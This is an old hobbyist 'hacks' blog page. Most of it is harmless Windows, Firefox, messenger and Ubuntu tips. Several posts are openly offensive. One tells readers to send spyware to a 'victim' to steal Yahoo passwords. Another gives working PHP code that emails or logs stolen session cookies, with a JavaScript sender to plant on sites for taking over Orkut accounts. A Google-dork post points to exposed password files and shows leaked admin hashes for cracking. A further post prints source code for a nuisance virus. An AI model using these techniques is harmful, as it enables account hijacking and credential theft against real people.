Showing posts with label Internet. Show all posts
Showing posts with label Internet. Show all posts

multiple Instances of yahoo messenger and google gtalk #

Author: nspanspa // Category: , ,
If you are a Internet freak as I am , then you must be having a lot
of email id's (yahoo,gmail,hotmail)....however you could run only one
yahoo ID at a time in yahoo messenger.... i figured this out... as easy
as making लस्सी .... just a registry tweak .... having a problem just
consult me through comment.

Follow these steps for yahoo messenger :

1. Go to Start ----> Run . Type regedit, then enter .

2.Navigate to HKEY_CURRENT_USER --------> Software --->yahoo ----->pager---->Test

3.On the right pane , right-click and choose new Dword value .

4.Rename it as Plural.

5.Double click and assign a decimal value of 1.


That's it done!!
Now close registry and restart yahoo messenger .For signing in with new id open another messenger.

for google gtalk :
For
any Google Gtalk fans want to run multiple instance Gtalk messenger
account at the same times. Here is a simple trick you can run multiple
instance of GTalk Account by adding or enter some command the GTalk
Messenger software and run it.
  1. Right Click on your Gtalk
    shortcut.[Remember only this shortcut will run multiple
    instances,others wont be able to unless you edit their properties same
    as we are going to do now]
  2. Now go to properties
  3. In the target box,you will find something like this “C:\Program Files\Google\Google Talk\googletalk.exe”multiple instance of GOogle GTalk
  4. Now
    add -nomutex at the end of text in Target with a space.It will now
    become like “C:\Program Files\Google\Google Talk\googletalk.exe”
    -nomutex.im showing the same in the figure also
  5. Click Ok and you are done
Now
double click on the shortcut and you will see one more instance of
Gtalk running on your PC. You can do the same even for other gtalk
shortcuts in your pc.

Now some more simplified method : 

As
I have multiple ids of gmail and yahoo for either personal and
professional reasons. But you can’t run all ids at once on a single
computer. Either you use different browsers to run the web versions of
gtalk or yahoo web messenger or signin and signout using different ids.
Another solution is using meebo.


Know your email has been read !

Author: nspanspa // Category:
Have
you ever wondered, why you are not getting any reply to your mails?
Maybe the friend to whom you sent the mail did not even bother to open
it or maybe it never reached the recipient. How will you know?

How
to find out if your email has been read? If you have ever been anxious
to know if an important mail sent by you has been read by the recipient
or not, then here is the perfect tool for you.
SpyPig will send you an email as soon as the recipient opens and reads your message.


There are many ways you can benefit from SpyPig.Check
out whether your job application reached it’s target, or if the
classified you responded to on Craiglist was read by its owner
This online tool works with almost all modern email programs: Outlook, Eudora, Yahoo, Gmail, Hotmail, AOL and many others.

Hack Yahoo ID

Author: nspanspa // Category: , ,
It is the easiest way to hack anyone's Yahoo ID's Password.

Follow these steps to hack the Yahoo ID

1. U have to make a server {spyware} given ur email id.

2. Send the server to the victim's computer anyhow.

3. When he will open it he cant realize that it was a spyware because after opening it, it will be deleted automatically.

4. After open this file, when he will go to login int his yahoo id his password and id will be send to ur given yahoo email id .

5. U can also disable his OS's many features .

There are three types of software by which u can make your own spyware {server]
U can download anyone and use it.


How to make cookies and hack Orkut accounts

Author: nspanspa // Category:
How to Make a Cookie Stealer

Introduction

Exactly how does a cookie stealer work, anyway? There are two components in a cookie stealer: the sender and the receiver.

The
sender can take many forms. In essense, it's just a link to the
receiver with the cookie somehow attached. It can sometimes be
difficult to find a way to implement the sender.

The receiver,
as the name suggests, is a device which receives the cookie from the
sender. It can also take several forms, but the most common is that of
a PHP document, most commonly found residing on some obscure webserver.


Step One: The Code

Coding
a receiver is the part with which most newbies struggle. Only two
things are needed to make a receiver: a webhost which supports PHP, and
Notepad (see the end of the text for a link to some free PHP hosts).

As
I said in the introduction, the receiver's job is to receive the cookie
from the sender. The easiest way to send information to a PHP document
is by using the HTTP GET method, which appends information to the end
of the URL as a parameter (for example, "page.php?arg1=value"). PHP can
access GET information by accessing $HTTP_GET_VARS[x], where x is a
string containing the name of the argument.

Once the receiver
has the cookie, it needs a way to get that cookie to you. The two most
common ways of doing this are sending it in an email, and storing it in
a log. We'll look at both.


First, let's look at sending it in an email. Here is what such a beast would look like (functioning code):

$cookie = $HTTP_GET_VARS["cookie"]; // line 2
mail("me@mydomain.com", "Cookie stealer report", $cookie); // line 3
?> // line 4


Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 accesses PHP's mail() function and sends the cookie to "me@mydomain.com" with the subject of "Cookie stealer report".
Line 4 tells the server that the PHP code ends here.


Next, we'll look at my preferred method, which is storing the cookie in a logfile. (functioning code)

$cookie = $HTTP_GET_VARS["cookie"]; // line 2
$file = fopen('cookielog.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4
?> // line 5


Lines 1 and 2 are the same as before.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line
4 writes the cookie to the file which has its handle in $file. The
period between $cookie and "\n\n" combines the two strings as one. The
"\n\n" acts as a double line-break, making it easier for us to sift
through the log file.
Line 5 is the same as before.


Step Two: Implementing the Stealer

The
hardest part (usually) of making a cookie stealer is finding a way to
use the sender. The simplest method requires use of HTML and
JavaScript, so you have to be sure that your environment supports those
two. Here is an example of a sender.

// Line 3


Line 1 tells the browser that the following chunk of code is to be interpereted as JavaScript.
Line
2 adds document.cookie to the end of the URL, which is then stored in
document.location. Whenever document.location is changed, the browser
is redirected to that URL.
Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).


There are two main ways of implementing the sender:

You
can plant your sender where the victim will view it as an HTML document
with his browser. In order to do that, you have to find some way to
actually post the code somewhere on the site.


How To Enable Right Click on websites

Author: nspanspa // Category: , ,
Lots of web sites have disabled the right click function of the
mouse button... it's really, really annoying. This is done so that you
don't steal (via right-click->save picture) their photos or images
or any other goodies. Unfortunately, it disables ALL right-click
functionality: copy, paste, open in new window.

It's easy to change, assuming your using IE 6:
Click "Tools"->"Internet Options"
Click the "Security" tab
Click "Custom Level"
Scroll down to the "Scripting" section
Set "Active Scripting" to "disable"
Click "Ok" a couple of times.

You'll probably want to turn this back to "enable" when your done because generally the javascript enhances a website.


How To Make Make windows xp remember last opened folders on next login

Author: nspanspa // Category: , ,
Remember open folders next time you
Login.On other versions of Windows, folders and Explorer windows you
had open when you logged off would open again the next time you logged
on.

To activate this option in Windows XP:

1.choose Tools, Folder Options in any window,

2.click the View tab, scroll and check click” Restore previous folder windows at logon”,

3. click OK.


Thats All !!!

HOw Configuring firefox as you wish HAckZ

Author: nspanspa // Category: , ,
n this tutorial, I’ll tell you about 3 files, that can be edited to configure Firefox.

user.js
Used to change various preferences.
userChrome.css
Used to change the appearance of the browser.
userContent.css
Used to change the appearance of web pages.

All
these files are plain text files stored in your profile folder, and can
be edited using a standard text editor, such as Notepad on Windows and
gedit or kate on Linux.

The Profile Folder

The profile folder is where Firefox saves all your settings and refers to a location on your hard drive.

On Windows XP/2000, the path is usually

%AppData%\Mozilla\Firefox\Profiles\xxxxxxxx.defaul
t\, where xxxxxxxx is a random string of 3 characters. Just browse to
C:\Documents and Settings\[User Name]\Application
Data\Mozilla\Firefox\Profiles\ and the rest should be obvious.

On Windows 95/98/Me, the path is usually C:\WINDOWS\Application Data\Mozilla\Firefox\Profiles\xxxxxxxx.default\

On Linux, the path is usually ~/.mozilla/firefox/xxxxxxxx.default/

On MacOS X, the path is usually ~/Library/Application Support/Firefox/Profiles/xxxxxxxx.default/

Firefox
is capable of handling more than one user and thus, more than one
profile. The path examples above refers to the default profile that is automatically created when you start Firefox for the first time. You can manage any number of profiles by using the Profile Manager.

%AppData%
is a shorthand for the Application Data path on Windows 2000/XP. To use
it, click Start > Run…, enter %AppData% and press Enter. You will be
taken to the “real” folder, which is normally C:\Documents and
Settings\[User Name]\Application Data.

user.js

This is
the main preferences file for Firefox and is located in you profile
folder. The file does not exist by default, so you need to create it
before you can start adding your preferences.

userChrome.css

This
file sets the display rules for various elements in the Firefox user
interface and is located in the sub-folder called chrome in your
profile folder. As with user.js, this file does not exist by default,
so you need to create it before you can start adding your preferences.
There’s actually an example file that exists by default, called
“userChrome-example.css“. Basically, you can just rename that file by
removing the “-example” part.

userContent.css

This
file sets the display rules for web content and is located in the
sub-folder called chrome in your profile folder. As with user.js, this
file does not exist by default, so you need to create it before you can
start adding your preferences. As with userChrome.css, there is an
example file that exists by default, called “userContent-example.css“.
Basically, you can just rename that file by removing the “-example”
part.

Upcoming more on Firefox....so keep visiting.........


1. Type "about:config" into the address bar and hit return. Scroll down and look for the following entries:

network.http.pipelining,
network.http.proxy.pipelining,
network.http.pipelining.maxrequests

2. Normally the browser will make one request to a web page at a time. When you enable pipelining it will make several at once, which really speeds up page loading.

3. Alter the entries as follows:

4. Set "network.http.pipelining" to "true" by double-clicking it.

5. Set "network.http.proxy.pipelining" to "true" by double-clicking it.

6. Set "network.http.pipelining.maxrequests" to 8 by double-clicking it. This means it will make 8 requests at once. There is no point setting it higher then 8 as it is capped at 8 max. [The default value for this setting is 4]

7. Lastly right-click anywhere and select New-> Integer. Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it receives.

8. If you're using a broadband connection you'll load pages MUCH faster now!


How To Chat with readers live with google talk chatback badge HackZ

Author: nspanspa // Category: , , , ,
Like Meebo Me, Google Talk now allows you to chat with people who may not have signed up for Google Talk or a Google Account.

This is possible through a new Google Talk Chat Badge
that bloggers can embed in their web pages to chat live with blog
readers and other site visitors.



It really doesn’t matter whether your readers have a Google Talk account or not - they can talk to you through the web page as long as you are signed into your GTalk account.




When they visit your site, they’ll see a badge like the one on the
right showing your online status (available, busy, offline) and, if
you’re available, they can just click and start chatting. Chatback uses
the web-based Google Talk Gadget so your visitors don’t need to
download anything. It opens in a new window so they can keep chatting
with you even if they browse to other pages.

Of course, chatback isn’t just for blogs. You can use it on any web
page that you can add HTML content to. To get started, visit the chatback start page. (This is also linked from the Google Talk homepage.)
Then just copy the provided HTML snippet to your web site. Visitors
will then see a badge on your site indicating your availability, and
can click to start a chat with you. If there’s a time when you don’t
want to be distracted, just set your online status to “busy” and
visitors won’t be able to chat with you until you change your status
back to “available.”


How To Remove Remove 'Orkut is Banned you fool' virus!!! HackZ

Author: nspanspa // Category: , , ,

Many of my NITW pal must be suffering from this 'Orkut is banned you
fool,Muhaaa haha bla bla....." then herezz this post fior you....

Virus Code:

ifwinactive ahk_class IEFrame
{

ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{


It
is the source code of a virus that blocks Orkut, Youtube and Firefox
and shows a message as under,if you try to open either of the two
websites :

"ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did?? MUHAHAHA!!"

It
makes a folder named heap41a in the C:\ drive with attributes S (System
file) and H (Hidden file).If your pc is infected by this virus then
just boot it in safe mode,goto cmd prompt and at C:\> type attrib -S
-H heap41a to make this folder visible and then just delete this
folder.Now use a registry cleaner to delete the registry keys made by
this

Easy Method to delete the virus.

open
task manager>process tab>there if you find svchost.exe befor your
user name (remember also system will use svchost.exe don't end that)
just give end process for that then go to run and type C://heap41a and
delete all files of that folder.. now you are done Enjoy orkut..


Free For unblocking and blocking websites

Author: nspanspa // Category: , ,
FOR BLOCKING

Do The Following :

For eg you want to block www.xyz.com !


* Open the folder C:\WINDOWS\system32\drivers\etc

* There you will find a file named HOSTS

* Click on the file and press SHIFT and now right click on it .

* From the right click menu select Open with .

* Now, select Notepad to open the file from the list !

* Now, in the file under the line 127.0.0.1 localhost add another line as 127.0.0.2 www.xyz.com.

* Now, File>>Save !

For unblocking just follow the same procedure vice versa...!!!!!

How To Downloading YOUTUBE VIDEOS

Author: nspanspa // Category: , ,


Many of my friends ask me about how to find or download videos online...
And i also know that most of you know about it tooo

  • Alright first step: Open YouTube
  • Second Step: Search for Your song
  • Third Step: Click on the song you want
  • Fourth Step: Check out the address bar where you enter the Youtube.com and copy the code there which something appears like http://youtube.com/watch?v=NqzL3VCTyeg
  • Open KeepVid.com
  • Place the Copied code in the place given and click on Download
  • As soon as you click on Download,You will see a Download Link will come
  • Click on the download Link and save the file
  • Once file is saved ,rename it as .flv file
  • Download FLV player from Keepvid.com
Thats it!!! You have downloaded the required Video file which can be converted into MP3 or other fomat at Keepvid.com only....
IF U USE FIREFOX YOU CAN DOWNLOAD VARIOUS ADD-ONS FOR VIDEO DOWNLOADING SUCH AS MEDIA-PIRATE,VIDEO DOWNLOADER ETC.

Ubuntu hack and Right click menu hack

Author: nspanspa // Category: , , ,
If you’re like me, you like the option of being able to open certain
applications on the fly, simply by selecting them from your right click
menu. It is possible to add your most used, or any applications to the
Ubuntu right click menu with a tool called Nautilus Actions.

1. The first thing you need to do is install the Nautilus Actions application:

sudo apt-get install nautilus-actions

2. After it is installed, navigate to your System > Preferences menu and select Nautilus Actions Configuration

Adding Shortcuts to the right click menu in Ubuntu

You should now see the Nautilus Actions main screen

Adding Shortcuts to the right click menu in Ubuntu

3. Click the Add button and you should see the Add a New Action screen

Adding Shortcuts to the right click menu in Ubuntu

4.
Fill out the Menu Item & Action properties with whatever you would
like in your right click menu. Above, you can see I am using VLC as an
example.

Next, click on the Conditions tab.

Adding Shortcuts to the right click menu in Ubuntu

5. Under the Conditions tab you need to make sure that Both is selected under “Appears if selections contains”.

Next, click on Advanced Conditions

Adding Shortcuts to the right click menu in Ubuntu

6.
First, uncheck the “File / Local Files” box. Second, in order for the
menu items you add to appear every time you right click, you will need
to add a blank entry under the Advanced Conditions. To do this, click
on the + and erase “new-scheme” and “new-scheme description” so that
both entries are blank.

7. Click OK.

8. You now have
added your first right click menu item. In order for the item to appear
on your right click menu, you need to restart the nautilus daemon.


killall -HUP nautilus



Now you should be able to see the VLC media player on the right click menu.

Adding Shortcuts to the right click menu in Ubuntu

To continue adding more items to the menu, repeat steps 3 through 8 until you are satisfied.

How TO Speed up your Acrobat Reader just like Notepad

Author: nspanspa // Category: , ,

Do u get irritated when acrobat reader takes some really irritating
time to load when you want to open a pdf document. But cheer up that
there is a way to speed up the loading.Yups!!! there is one really easy
method...

1. Go to the installation folder of acrobat reader
(C:\program files\adobe\acrobat\reader\.. whatever)

2.
Move all the files and folders from the "plugins" directory to the
"Optional" directory. (I repeat.. cut and paste the files NOT copy
& paste).

Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).

And from now onwards your acrobat reader will load really very fast
and almost as good as notepad..and you yourself howzzz Notepad!!


How To Hide a file in an image

Author: nspanspa // Category: , ,
(Winrar required )

1.
Gather the file you wish to bind, and the image file, and place them in
a folder. For the sake of this demonstration, I will be using
C:\New Folder
-The image will hereby be referred to in all examples as fluffy.jpg
-The file will hereby be referred to in all examples as New Text Document.txt

2.
Add the file/files you will be injecting into the image into a WinRar
.rar . From here on this will be referred to as (secret.rar)

3. Open command prompt by going to Start > Run > cmd

4. In Command Prompt, navigate to the folder where your two files are by typing
cd location [ex: cd C:\New Folder]

5. Type [copy /b fluffy.jpg + secret.rar fluffy.jpg] (remove the brackets)

Congrats,
as far as anyone viewing is concerned, this file looks like a JPEG,
acts like a JPEG, and is a JPEG, yet it now contains your file.

In order to view/extract your file, there are two options that you can take

a) Change the file extension from fluffy.jpg to fluffy.rar, then open and your file is there
b) Leave the file extension as is, right click, open with WinRar and your file is there

Hacking for begineers+Explained with google HAckZ

Author: nspanspa // Category: , ,
Everyone knows google in the security sector...and what a powerful tool
it is,just by entering certain search strings you can gain a vast
amount of knowledgeand information of your chosen target...often
revealing sensitive data...thisis all down to badly configured
systems...brought on by sloppy administrationallowing directory
indexing and accessing , password files , log entrys ,files , paths
,etc , etc
Search Tips
so how do we start ?
the common search inputs below will give you an idea...for instance if youwant to search for the an index of "root"
in the search box put in exactly as you see it below
==================
example 1:
allintitle: "index of/root"
result:
http://www.google.com/search?hl=en&ie=ISO-8859-1&q=allintitle%3A+%22index+of%2Froot%22&btnG=Google+Search
what it reveals is 2,510 pages that you can possible browse at your will...
====================
example 2
inurl:"auth_user_file.txt"
http://www.google.com/search?num=100&hl=en&lr=&ie=ISO-8859-1&q=inurl%3A%22auth_user_file.txt%22&btnG=Google+Search
this result spawned 414 possible files to access
here
is an actual file retrieved from a site and edited , we know who
theadmin is and we have the hashes thats a job for JTR (john the ripper)
txUKhXYi4xeFsmasteradminWorasitJunsawangxxx@xxxonqk6GaDj9iBfNgtomjangBugTomxxx@xxxon
with the many variations below it should keep you busy for a long time mixingthem reveals many different permutations

HOw To open Password to open ms-office documents HAckZ

Author: nspanspa // Category: , ,
You can protect your document by applying password so that unauthorized person can not display as well as modify your document. You can apply two types of passwords:

Password to open the document:

If it is applied then you have to give the correct password to open the document, otherwise you cannot open the document.

Password to modify the document:

If it is applied then you have to give the correct password to modify the document, otherwise your document is opened but you cannot modify the document. It means that your document becomes read-only.

To apply a password to document, follow these steps.

* Open Save As dialog box by selecting "Save As" command from File menu.

* Click "Tools" button of Save As dialog box and choose "General Options" from drop down menu, "Save" dialog box appears as shown in figure below.

* Enter first password in "Password to open" text box and second password in "Password to modify" text box (if required) and click "Ok" button of dialog box. Microsoft Word will open "Confirm Password" dialog box for the confirmation of passwords. The maximum length of password is 15 characters.

* Re-enter the password to open and password to modify and click "Ok" button of Confirm Password dialog boxes one by one.

* Click "Save" button of Save As dialog box.


Save some space in windows vista using compress folder option HackZ

Author: nspanspa // Category: , ,
Hey...Howzzz going?? As my work is increasing day by day,more and
more files to be save...efficient use of memory ie hard disk space is
utmost for my systems. The personal system I am using these days is a
Dell Laptop with 160 GB hard disk. Alright...now there is an awesome
technique to squeez out some important space by going through following
three steps...

The basic funda behind getting some extra space
is using compress folder technique and the best part its not like
zip-unzip....even after compressing the folders you will able to use
the folders the similar ways without requiring any extrating or
unzipping work.So worth doing it!!

1.Select the folder which you want to squeez and check out its properties. There is an Advance option in it click on it.

2. In advance option,check the compress option and click on Ok and then click on apply....


3.
Choose the option to compress folder and subfolders all....and press
ok....here it is...The folder will be the same but will now be holding
40% less space than before.



Yippppeeee!!!! Save the Earth .....Save the Memory......Save Money !!!


How To Reinstalling and formatting operating system

Author: nspanspa // Category: , ,

#1 Backing up files

If you have a habit of saving
all the files in My Documents, This is your first step. Check out all
possible folders like My Pictures, My Music and copy whichever is
required to some other folder. You will loose data as they are in same
drive where you will install the OS.

#2 Saving your configuration and profile files

In
most of the software’s the facility to backup profiles or software
configuration is present. Now in case you are going to install the
software after re installation, You ,must do it so that you don’t loose
your optimized settings and save time.

#3 Saving all your download folders and files

By
default all softwares and settings are made to save files somewhere in
C directory. Now lets say you downloaded a complete setup of itunes
which is around 50 MB and saved in C:\download, If you don’t back it up
you will have to re download that which will be ultimate waste of time.
So in case you have any thing like this save it.

#4 Re think on Partition Size.

Now
lets say You have re installed as you don’t have much space left and
You decided to reinstall everything and install only the required once
to save space. Since you are going to re install its a better idea to
increase the size of you partition . You might need some professional
help or somebody who knows how to do this, but it will help you in long
run.

#5 Note down things you need to install after this

Now since we have backed up everything and its ready to go . This one step you must follow.
Make a list of things you will be installing after reinstallation is over. Here is QUICK LIST
  • DRIVERS
  • Antivirus and Spywares
  • Browsers and addons.
  • Office Suites
  • Media Players and updates.
  • Rest of the things.

It gives you an idea of general things, You can change the list according to your need


How to Use YourFreedom for proxy and anonymous surfing

Author: nspanspa // Category: , ,
Your Freedom is one of the best proxy tunneling softwares that i
have ever used.It not only gives you anonymous surfing but also
increases the speed of your internet by taking specific bandwidth from
the network[if your computer is on LAN] ...here by I am giving you the
procedure to use it.

  • Download Your Freedom -download mirror 1 Downlaod mirror 2
  • Setup the downloaded setup file
  • Now go to Your Freedom website to register and get on username and password,verify your email id.
  • Open Your Freedom in your computer and click on Configure button
  • Fill-in your IP and Port address [IP of the Lan Proxy server and 8080 as Port]
  • You
    will find an account section put in your username and password with
    which you registered on Your Freedom website and then press on Use
    Wizard
  • Wizard will choose servers working for them at that time,wait for 5 minutes
  • You will get a list of servers ,click on anyone[preferably the top most server]
  • Now on the main window of Your Freedom click on Start connection
  • Setting
    for Internet explorer: Change proxy server to 127.0.0.1 and port as
    8080 in the LAN settings section in Options tab in your internet browser
For any inquiry feel free to contact us!!Give your comments!!

How To Multiple Login using firefox in orkut HAckZ

Author: nspanspa // Category: , , ,
Multiple Login in Orkut using Mozilla Firefox Browser

Step 1:
open
system properties(by right clicking my computer), choose tab advanced,
click to environment variables button. in system variables section,
click new. type this information to each textbox.

variable name: moz_no_remote(should be all small letter)

variable value: 1

press ok to close all windows.

step 2:
open
firefox icon's properties(from desktop and quick launch). add extension
-p to command line(like "c:\program files\mozilla firefox\firefox.exe"
-p). press ok.

while starting firefox u have to create two
separate profiles of firefox so that u can login to two accounts of
any(orkut,yahoo,rediff or anything else).......
for three logins create three profiles of firefox.........